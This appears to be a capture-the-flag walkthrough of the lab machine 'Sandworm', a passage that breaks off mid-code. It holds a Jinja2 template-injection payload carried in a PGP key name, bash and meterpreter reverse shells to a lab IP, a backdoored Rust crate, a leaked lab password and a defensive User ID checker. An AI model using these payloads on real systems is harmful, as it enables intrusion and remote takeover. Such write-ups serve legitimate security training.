Service overview

Let's see what is running on the machine:

$ nmap -sV -sC -Pn -p1-65535 -vv -oN 10.10.11.218 10.10.11.218
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 13:57 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:57
Completed Parallel DNS resolution of 1 host. at 13:58, 6.01s elapsed
Initiating Connect Scan at 13:58
Scanning 10.10.11.218 [65535 ports]
Discovered open port 80/tcp on 10.10.11.218
Discovered open port 443/tcp on 10.10.11.218
Discovered open port 22/tcp on 10.10.11.218
Connect Scan Timing: About 31.94% done; ETC: 13:59 (0:01:06 remaining)
Increasing send delay for 10.10.11.218 from 0 to 5 due to max_successful_tryno increase to 4
Connect Scan Timing: About 42.57% done; ETC: 14:00 (0:01:22 remaining)
Connect Scan Timing: About 66.43% done; ETC: 14:01 (0:01:13 remaining)
Connect Scan Timing: About 75.77% done; ETC: 14:02 (0:00:58 remaining)
Increasing send delay for 10.10.11.218 from 5 to 10 due to max_successful_tryno increase to 5
Connect Scan Timing: About 85.02% done; ETC: 14:02 (0:00:42 remaining)
Completed Connect Scan at 14:03, 342.30s elapsed (65535 total ports)
Initiating Service scan at 14:03
Scanning 3 services on 10.10.11.218
Completed Service scan at 14:04, 12.35s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.11.218.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 2.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.45s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Nmap scan report for 10.10.11.218
Host is up, received user-set (0.052s latency).
Scanned at 2023-06-30 13:58:05 EDT for 358s
Not shown: 65532 closed tcp ports (conn-refused)
PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
|   256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp  open  http     syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
443/tcp open  ssl/http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET OPTIONS HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA/organizationalUnitName=SSA/localityName=Classified/emailAddress=atlas@ssa.htb
| Issuer: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA/organizationalUnitName=SSA/localityName=Classified/emailAddress=atlas@ssa.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-04T18:03:25
| Not valid after:  2050-09-19T18:03:25
| MD5:   b8b7:487e:f3e2:14a4:999e:f842:0141:59a1
| SHA-1: 80d9:2367:8d7b:43b2:526d:5d61:00bd:66e9:48dd:c223
| -----BEGIN CERTIFICATE-----
| MIIDpTCCAo0CFBEpfzxeoSRi0SkjUE4hvTDcELATMA0GCSqGSIb3DQEBCwUAMIGN
| MQswCQYDVQQGEwJTQTETMBEGA1UECAwKQ2xhc3NpZmllZDETMBEGA1UEBwwKQ2xh
| c3NpZmllZDEaMBgGA1UECgwRU2VjcmV0IFNweSBBZ2VuY3kxDDAKBgNVBAsMA1NT
| QTEMMAoGA1UEAwwDU1NBMRwwGgYJKoZIhvcNAQkBFg1hdGxhc0Bzc2EuaHRiMCAX
| DTIzMDUwNDE4MDMyNVoYDzIwNTAwOTE5MTgwMzI1WjCBjTELMAkGA1UEBhMCU0Ex
| EzARBgNVBAgMCkNsYXNzaWZpZWQxEzARBgNVBAcMCkNsYXNzaWZpZWQxGjAYBgNV
| BAoMEVNlY3JldCBTcHkgQWdlbmN5MQwwCgYDVQQLDANTU0ExDDAKBgNVBAMMA1NT
| QTEcMBoGCSqGSIb3DQEJARYNYXRsYXNAc3NhLmh0YjCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAKLTqQshN1xki+1sSRa6Yk5hlNYWroPyrVhm+FuKMpNL
| cjW9pyNOV/wvSdCRuk/s3hjqkIf12fljPi4y5IhqfcpTk+dESPGTiXdrE7oxcWHn
| jQvE01MaT9MxtIwGiRBupuFvb2vIC2SxKkKR28k/Y83AoJIX72lbeHJ9GlNlafNp
| OABrIijyFzBou6JFbLZkL6vvKLZdSjGy7z7NKLH3EHTBq6iSocSdxWPXtsR0ifeh
| hODGT2L7oe3OWRvClYTM3dxjIGC64MnP5KumamJoClL2+bSyiQzFJXbvcpGROgTU
| 01I6Qxcr1E5Z0KH8IbgbREmPJajIIWbsuI3qLbsKSFMCAwEAATANBgkqhkiG9w0B
| AQsFAAOCAQEAdI3dDCNz77/xf7aGG26x06slMCPqq/J0Gbhvy+YH4Gz9nIp0FFb/
| E8abhRkUIUr1i9eIL0gAubQdQ6ccGTTuqpwE+DwUh58C5/Tjbj/fSa0MJ3562uyb
| c0CElo94S8wRKW0Mds0bUFqF8+n2shuynReFfBhXKTb8/Ho/2T2fflK94JaqCbzM
| owSKHx8aMbUdNp9Fuld5+Fc88u10ZzIrRl9J5RAeR5ScxQ4RNGTdBVYClk214Pzl
| IiyRHacJOxJAUX6EgcMZnLBLgJ1R4u7ZvU3I3BiaENCxvV6ITi61IwusjVCazRf3
| NNn7kmk7cfgQqPCvmwtVrItRHxWEWnkNuQ==
|_-----END CERTIFICATE-----
|_http-title: Secret Spy Agency | Secret Security Service
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 364.46 seconds

Add the host to /etc/hosts:

10.10.11.218 ssa.htb

Web

[screenshot]

Let's see what is on the web server:

$ gobuster dir -u https://ssa.htb -w /usr/share/wordlists/dirb/common.txt -k -t 20
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://ssa.htb
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/30 14:07:05 Starting gobuster in directory enumeration mode
===============================================================
/about                (Status: 200) [Size: 5584]
/admin                (Status: 302) [Size: 227] [--> /login?next=%2Fadmin]
/contact              (Status: 200) [Size: 3543]
/guide                (Status: 200) [Size: 9043]
/login                (Status: 200) [Size: 4392]
/logout               (Status: 302) [Size: 229] [--> /login?next=%2Flogout]
/pgp                  (Status: 200) [Size: 3187]
/process              (Status: 405) [Size: 153]
/view                 (Status: 302) [Size: 225] [--> /login?next=%2Fview]
Progress: 4535 / 4615 (98.27%)
===============================================================
2023/06/30 14:07:23 Finished
===============================================================

Note that the application runs on Flask. The service lets you work with PGP digital signatures (encrypt, decrypt, sign and verify messages). Let's verify a signature:

[screenshot]

Note the user atlas. Let's generate our own key:

$ gpg --full-generate-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Please select what kind of key you want:
   (1) RSA and RSA (default)
   (2) DSA and Elgamal
   (3) DSA (sign only)
   (4) RSA (sign only)
  (14) Existing key from card
Your selection? 1
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (3072) 1024
Requested keysize is 1024 bits
Please specify how long the key should be valid.
         0 = key does not expire
      <n>  = key expires in n days
      <n>w = key expires in n weeks
      <n>m = key expires in n months
      <n>y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y

GnuPG needs to construct a user ID to identify your key.

Real name: username
Email address:
Comment:
You selected this USER-ID:
    "username"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: /home/kali/.gnupg/trustdb.gpg: trustdb created
gpg: directory '/home/kali/.gnupg/openpgp-revocs.d' created
gpg: revocation certificate stored as '/home/kali/.gnupg/openpgp-revocs.d/355C7662B48FA8D21784839890AC132C18672DCF.rev'
public and secret key created and signed.

pub   rsa1024 2023-06-30 [SC]
      355C7662B48FA8D21784839890AC132C18672DCF
uid                      username
sub   rsa1024 2023-06-30 [E]
$ gpg --output public.gpg --armor --export username
File 'public.gpg' exists. Overwrite? (y/N) y

$ cat public.gpg
-----BEGIN PGP PUBLIC KEY BLOCK-----

...
=tZNK
-----END PGP PUBLIC KEY BLOCK-----

Paste it into the web app and receive a message encrypted to our key:

-----BEGIN PGP MESSAGE-----

hIwDAk7o6EWRNkkBBACxlyyLVIOX2Loj8ohdgQr86jXFTf6ZyLTxkVmy5DX52Eoe
lpjRTBdNw4YakQsIuobWsDdWHpmQ4BsvKj9C/nHc+pr6Zrho+CIRKFxCyIpKP7pq
FuBq8CHJT7jBcDQyhJuXfbQdQQuYgWRTbPK1U5SJp4uiQPUqLKBIJChUw875O9LA
agFcHaYrohQKTzPULD6fKvd6jiS0rBfTkA72NZCeD86we7b5VjP1dJ38NM2mlkya
om7ZNiK6Xk02wEfM/r5/lIxX8rdOBy6pZgYD84BkDKJkCvg9RFHt5TH2c6lu2nYm
HotnYryEWkCFFpMQHXeNGKdBrdIq1YcQx+RSOj7fE+xDqbbku//75zDOYxY2+7y6
MBuai1Ooo5N2htlEf//0kuXzpJfHOf7risS4Ptieb0nSHpaC3RoB/a+v0kghE29p
pSHN2AZyNqHG1yQVSmWW1fQ7nBXk3ZBPtsZn6FaGTYw9kqfDoaFKy0nkf6xEkjpz
RTuLT7ty2AqCJnQb7/qs5O+A0vhm5FGND7Jm833DBhbqEW5BZ2klTzw8fYoUO66U
eSbQFdq8fXU91A0=
=QXWP
-----END PGP MESSAGE-----
$ gpg --output message --decrypt message.enc
gpg: encrypted with 1024-bit RSA key, ID 024EE8E845913649, created 2023-06-30
      "username"

$ cat message
This is an encrypted message for username.

If you can read this, it means you successfully used your private PGP key to decrypt a message meant for you and only you.

Congratulations! Feel free to keep practicing, and make sure you also know how to encrypt, sign, and verify messages to make your repertoire complete.

SSA: 06/30/2023-18;20;30

Note that the username was substituted into the message body, so the page is most likely built from a template and may be vulnerable to Server-Side Template Injection; test it the standard way. Change the key's name to {{7*7}}, then submit the new public key together with a clear-signed text:

$ echo test | gpg --clear-sign
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

test
-----BEGIN PGP SIGNATURE-----

iLMEAQEKAB0WIQQ1XHZitI+o0heEg5iQrBMsGGctzwUCZJ8gnwAKCRCQrBMsGGct
z6pQA/0X2iQ57/1G6jMxcYcoha892+eGv7a/GOydGLuZE6nKSIeDYgHjQQ8OAY2i
6R6g1kdpzvbDUKh1yIox7uFJSKPG2Q72Qj2QKq2KPrXqHEkfvKMyCFE7QpCbIY6i
EQtm+1gqRr3B+SAa7raFaHStVMWc7oTAsdL0TeEJ1vkKh0/snA==
=9Q2h
-----END PGP SIGNATURE-----

On verification the server evaluates 7*7 and prints 49:

[screenshot]

Using the usual template-engine fingerprinting probes we determined that the engine is Jinja2. Build the payload (a bash reverse shell, base64-wrapped so that no quotes or redirection characters have to survive the template):

$ echo "/bin/bash -l > /dev/tcp/10.10.14.194/443 0<&1 2>&1" | base64 -w 0
L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK
bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}

Now use this as the key's user ID instead of the name:

$ gpg --edit-key {{7*7}}
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Secret key is available.

sec  rsa1024/90AC132C18672DCF
     created: 2023-06-30  expires: never       usage: SC
     trust: ultimate      validity: ultimate
ssb  rsa1024/024EE8E845913649
     created: 2023-06-30  expires: never       usage: E
[ultimate] (1). {{7*7}}

gpg> adduid
Real name: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}
Email address:
Comment:
You selected this USER-ID:
    "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O

sec  rsa1024/90AC132C18672DCF
     created: 2023-06-30  expires: never       usage: SC
     trust: ultimate      validity: ultimate
ssb  rsa1024/024EE8E845913649
     created: 2023-06-30  expires: never       usage: E
[ultimate] (1)  {{7*7}}
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}

gpg> trust
sec  rsa1024/90AC132C18672DCF
     created: 2023-06-30  expires: never       usage: SC
     trust: ultimate      validity: ultimate
ssb  rsa1024/024EE8E845913649
     created: 2023-06-30  expires: never       usage: E
[ultimate] (1)  {{7*7}}
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}

Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)

  1 = I don't know or won't say
  2 = I do NOT trust
  3 = I trust marginally
  4 = I trust fully
  5 = I trust ultimately
  m = back to the main menu

Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y

sec  rsa1024/90AC132C18672DCF
     created: 2023-06-30  expires: never       usage: SC
     trust: ultimate      validity: ultimate
ssb  rsa1024/024EE8E845913649
     created: 2023-06-30  expires: never       usage: E
[ultimate] (1)  {{7*7}}
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}

gpg> uid 1

sec  rsa1024/90AC132C18672DCF
     created: 2023-06-30  expires: never       usage: SC
     trust: ultimate      validity: ultimate
ssb  rsa1024/024EE8E845913649
     created: 2023-06-30  expires: never       usage: E
[ultimate] (1)* {{7*7}}
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}

gpg> deluid
Really remove this user ID? (y/N) y

sec  rsa1024/90AC132C18672DCF
     created: 2023-06-30  expires: never       usage: SC
     trust: ultimate      validity: ultimate
ssb  rsa1024/024EE8E845913649
     created: 2023-06-30  expires: never       usage: E
[ unknown] (1). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMTk0LzQ0MyAwPCYxIDI+JjEK | base64 -d | bash"').read() }}

gpg> save

[screenshot]

[screenshot]
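To make clear where the injection actually enters: the User ID of an OpenPGP key is an arbitrary byte string chosen by the key owner (RFC 4880 packet tag 13, up to 4 GiB long), and the application renders it into a Jinja2 template. The script below is an added example, not code from this write-up or from the SSA application: it strips the ASCII armor (checking the CRC-24 line), walks the packets of the key, pulls out every User ID, and flags the ones that contain template syntax, which is the check a server accepting uploaded keys, or a detection rule over such uploads, would want. The key it parses is constructed in the code (a dummy public-key packet that is not a usable key, plus two User IDs), so it runs offline; `looks_like_template` and its marker list are my own heuristic.

```python
import base64
import re

USER_ID_TAG = 13        # RFC 4880 section 5.11
PUBLIC_KEY_TAG = 6
# Heuristic (mine): Jinja2/Twig, ERB/JSP, shell/Groovy and Ruby interpolation openers.
TEMPLATE_MARKERS = re.compile(r"\{\{|\{%|\$\{|<%|#\{")


def crc24(data: bytes) -> int:
    """Armor checksum from RFC 4880 section 6.1."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def encode_packet(tag: int, body: bytes) -> bytes:
    """New-format packet header (RFC 4880 section 4.2.2)."""
    n = len(body)
    if n < 192:
        length = bytes([n])
    elif n <= 8383:
        length = bytes([((n - 192) >> 8) + 192, (n - 192) & 0xFF])
    else:
        length = b"\xff" + n.to_bytes(4, "big")
    return bytes([0xC0 | tag]) + length + body


def armor(packets: bytes, label: str = "PUBLIC KEY BLOCK") -> str:
    b64 = base64.b64encode(packets).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    crc = base64.b64encode(crc24(packets).to_bytes(3, "big")).decode()
    return "\n".join([f"-----BEGIN PGP {label}-----", ""] + lines
                     + [f"={crc}", f"-----END PGP {label}-----"])


def dearmor(text: str) -> bytes:
    """Strip the armor, verify the CRC-24 line and return the raw packet bytes."""
    m = re.search(r"-----BEGIN PGP [A-Z ]+-----\n(.*?)-----END PGP", text, re.S)
    if not m:
        raise ValueError("no armored block found")
    lines = m.group(1).splitlines()
    if "" in lines:                       # armor headers (Version:, Hash:) end at the first blank line
        lines = lines[lines.index("") + 1:]
    data = base64.b64decode("".join(l for l in lines if l and not l.startswith("=")))
    crc_lines = [l for l in lines if l.startswith("=")]
    if crc_lines and int.from_bytes(base64.b64decode(crc_lines[0][1:]), "big") != crc24(data):
        raise ValueError("armor checksum mismatch")
    return data


def parse_packets(data: bytes):
    """Yield (tag, body) for every packet; understands old- and new-format headers."""
    pos = 0
    while pos < len(data):
        ctb = data[pos]
        if not ctb & 0x80:
            raise ValueError(f"not a packet header at offset {pos}")
        pos += 1
        if ctb & 0x40:                    # new format
            tag, first = ctb & 0x3F, data[pos]
            if first < 192:
                length, pos = first, pos + 1
            elif first <= 223:
                length, pos = ((first - 192) << 8) + data[pos + 1] + 192, pos + 2
            elif first == 255:
                length, pos = int.from_bytes(data[pos + 1:pos + 5], "big"), pos + 5
            else:
                raise ValueError("partial body lengths are not handled here")
        else:                             # old format, what GnuPG writes for User IDs
            tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
            if ltype == 3:
                raise ValueError("indeterminate length is not handled here")
            size = (1, 2, 4)[ltype]
            length, pos = int.from_bytes(data[pos:pos + size], "big"), pos + size
        yield tag, data[pos:pos + length]
        pos += length


def user_ids(armored: str) -> list[str]:
    """Every User ID string in the key, exactly as the key owner chose it."""
    return [body.decode("utf-8", "replace")
            for tag, body in parse_packets(dearmor(armored)) if tag == USER_ID_TAG]


def looks_like_template(uid: str) -> bool:
    return TEMPLATE_MARKERS.search(uid) is not None


def constructed_key() -> str:
    """Constructed test key: a dummy v4 RSA public-key packet (tiny fake MPIs, not a usable
    key) plus two User IDs. The first uses the old-format header GnuPG emits; the second is
    padded to 230 bytes so it needs a two-byte length, showing the field is not a short name."""
    pubkey_body = b"\x04" + b"\x00\x00\x00\x00" + b"\x01" + b"\x00\x09\x01\x0b" + b"\x00\x03\x05"
    uid_plain = b"\xb4" + bytes([len(b"username")]) + b"username"
    ssti = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
    uid_ssti = encode_packet(USER_ID_TAG, ssti.ljust(230).encode())
    return armor(encode_packet(PUBLIC_KEY_TAG, pubkey_body) + uid_plain + uid_ssti)


if __name__ == "__main__":
    for uid in user_ids(constructed_key()):
        print(("TEMPLATE SYNTAX " if looks_like_template(uid) else "ok              ") + uid.strip())
```

Feed it a real exported key (gpg --armor --export) and it lists the User IDs the same way; the fix on the server side is not to filter these strings but never to paste them into template source at all: pass the uid as a template variable, or run the template in a sandboxed environment, so the value stays data.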

Meterpreter

Switch to meterpreter for convenience:

$ msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.14.194 LPORT=80 -f raw -o shell.py
$ cat shell.py | base64 -w 0
ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVQxRkxCQ0VRZmw1L2hXOHFtZXlHSFhXMFFVUVBFUkYwOXhZUnV6cVZyS3VpWG0xRi83MFRqMkNZNGZ2bW0yOW16Qng4ekRoNU5VSG0zOWFNZkJ3U3JDUlBPZTVVNXRuTWdGNTl4QXMyRHNmQnZRSHRXclpHVFk1Zis5eWt2ZzZMV3VnSlArRE53L1hkeTJiN2VITjF6NHBPS084Y3FFd3A2VnBSUW9ydVhCSisxcklpR0NNTUUycGdVUkJ5Y1M2clJiSUFnWjR5WlB0NmtkaTVNS2lKa3N0YndwT0lvRDZvWk95cGZVYTZQMkRMME9lN3NZQXRPS3JaaGQzYjZhUC83bkdsR1lJRkZDMVBDdzNLenlGQ1NyVCtMOGFWTEtTR291US9KSkYxK21Yb0R6RFpYb3M9JylbMF0pKSk=
cd /tmp
echo ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVQxRkxCQ0VRZmw1L2hXOHFtZXlHSFhXMFFVUVBFUkYwOXhZUnV6cVZyS3VpWG0xRi83MFRqMkNZNGZ2bW0yOW16Qng4ekRoNU5VSG0zOWFNZkJ3U3JDUlBPZTVVNXRuTWdGNTl4QXMyRHNmQnZRSHRXclpHVFk1Zis5eWt2ZzZMV3VnSlArRE53L1hkeTJiN2VITjF6NHBPS084Y3FFd3A2VnBSUW9ydVhCSisxcklpR0NNTUUycGdVUkJ5Y1M2clJiSUFnWjR5WlB0NmtkaTVNS2lKa3N0YndwT0lvRDZvWk95cGZVYTZQMkRMME9lN3NZQXRPS3JaaGQzYjZhUC83bkdsR1lJRkZDMVBDdzNLenlGQ1NyVCtMOGFWTEtTR291US9KSkYxK21Yb0R6RFpYb3M9JylbMF0pKSk= | base64 -d > shell.py
ls
shell.py
t
python3 shell.py

[screenshot]

Firejail

We are running inside a firejail sandbox.

[screenshot]

User credentials

Let's look for user credentials in the home directory.

[screenshot]

SSH

With the credentials from the previous step we can log in over SSH:

$ ssh silentobserver@ssa.htb
quietLiketheWind22

User flag

silentobserver@sandworm:~$ id
uid=1001(silentobserver) gid=1001(silentobserver) groups=1001(silentobserver)
silentobserver@sandworm:~$ ls -la
total 3084
drwxr-x--- 6 silentobserver silentobserver    4096 Jun 30 19:06 .
drwxr-xr-x 4 root           root              4096 May  4 15:19 ..
lrwxrwxrwx 1 root           root                 9 Nov 22  2022 .bash_history -> /dev/null
-rw-r--r-- 1 silentobserver silentobserver     220 Nov 22  2022 .bash_logout
-rw-r--r-- 1 silentobserver silentobserver    3771 Nov 22  2022 .bashrc
drwx------ 2 silentobserver silentobserver    4096 May  4 15:26 .cache
drwxrwxr-x 3 silentobserver silentobserver    4096 May  4 16:59 .cargo
drwx------ 4 silentobserver silentobserver    4096 Jun 30 17:50 .gnupg
drwx------ 5 silentobserver silentobserver    4096 Jun 30 15:20 .local
-rw------- 1 silentobserver silentobserver     601 Jun 30 17:49 .mysql_history
-rw-r--r-- 1 silentobserver silentobserver     807 Nov 22  2022 .profile
-rwxrwxr-x 1 silentobserver silentobserver 3104768 Jun 30 01:18 pspy64
-rw------- 1 silentobserver silentobserver       7 Jun 30 19:06 .python_history
-rw-r----- 1 root           silentobserver      33 Jun 30 15:14 user.txt
-rw------- 1 silentobserver silentobserver    3826 Jun 30 18:43 .viminfo
silentobserver@sandworm:~$ cat user.txt
af2c1d7646bfa86183e9dc105db44ccb

Privilege escalation

A job launched by root compiles and runs a Rust project with cargo. Note that it drops to the user atlas via sudo, and that --offline means cargo never fetches anything: it only uses crates already present on the box:

$ ps aux | grep cargo
root      468611  0.0  0.0   2888  1004 ?        Ss   19:16   0:00 /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline
root      468613  0.0  0.1  11660  5796 ?        S    19:16   0:00 /bin/sudo -u atlas /usr/bin/cargo run --offline

Project layout:

silentobserver@sandworm:/opt/tipnet$ ls -la
total 116
drwxr-xr-x 5 root  atlas  4096 Jun  6 11:49 .
drwxr-xr-x 4 root  root   4096 Jun 30 19:16 ..
-rw-rw-r-- 1 atlas atlas 35548 Jun 30 19:16 access.log
-rw-r--r-- 1 root  atlas 46161 May  4 16:38 Cargo.lock
-rw-r--r-- 1 root  atlas   288 May  4 15:50 Cargo.toml
drwxr-xr-- 6 root  atlas  4096 Jun  6 11:49 .git
-rwxr-xr-- 1 root  atlas     8 Feb  8 09:10 .gitignore
drwxr-xr-x 2 root  atlas  4096 Jun  6 11:49 src
drwxr-xr-x 3 root  atlas  4096 Jun  6 11:49 target

The program depends on a crate named logger that does not come from crates.io but is pulled in from a local path:

silentobserver@sandworm:/opt/tipnet$ cat Cargo.toml
[package]
name = "tipnet"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
chrono = "0.4"
mysql = "23.0.1"
nix = "0.18.0"
logger = {path = "../crates/logger"}
sha2 = "0.9.0"
hex = "0.4.3"

The beginning of the program that uses the logger crate:

extern crate logger;
use sha2::{Digest, Sha256};
use chrono::prelude::*;
use mysql::*;
use mysql::prelude::*;
use std::fs;
use std::process::Command;
use std::io;

// We don't spy on you... much.

struct Entry {
    timestamp: String,
    target: String,
    source: String,
    data: String,
}

fn main() {
    println!("
             ,,
MMP\"\"MM\"\"YMM db          `7MN.   `7MF'         mm
P'   MM   `7               MMN.    M           MM
     MM    `7MM `7MMpdMAo. M YMb   M  .gP\"Ya mmMMmm
     MM      MM   MM   `Wb M  `MN. M ,M'   Yb  MM
     MM      MM   MM    M8 M   `MM.M 8M\"\"\"\"\"\"  MM
     MM      MM   MM   ,AP M     YMM YM.    ,  MM
   .JMML.  .JMML. MMbmmd'.JML.    YM  `Mbmmd'  `Mbmo
                  MM
                .JMML.

");
...

Let's look at the crate itself:

silentobserver@sandworm:/opt/crates$ ls -la
total 12
drwxr-xr-x 3 root  atlas          4096 May  4 17:26 .
drwxr-xr-x 4 root  root           4096 Jun 30 19:20 ..
drwxr-xr-x 5 atlas silentobserver 4096 May  4 17:08 logger

The logger crate directory is owned by atlas with group silentobserver, and its source under logger/src turns out to be writable by our user (confirm with ls -la /opt/crates/logger/src before editing). Anything we put into this crate gets compiled and executed as atlas by the job above. Write the payload into it:

extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;

// Same signature as the original crate's log(), so tipnet compiles unchanged.
pub fn log(user: &str, query: &str, justification: &str) {
    // Reverse shell to the attacker; runs as whoever executes tipnet (atlas).
    let command = "bash -i >& /dev/tcp/10.10.14.194/443 0>&1";

    // .output() blocks until the shell exits, which is fine here: the job's
    // only use to us is handing over this shell.
    let output = Command::new("bash")
        .arg("-c")
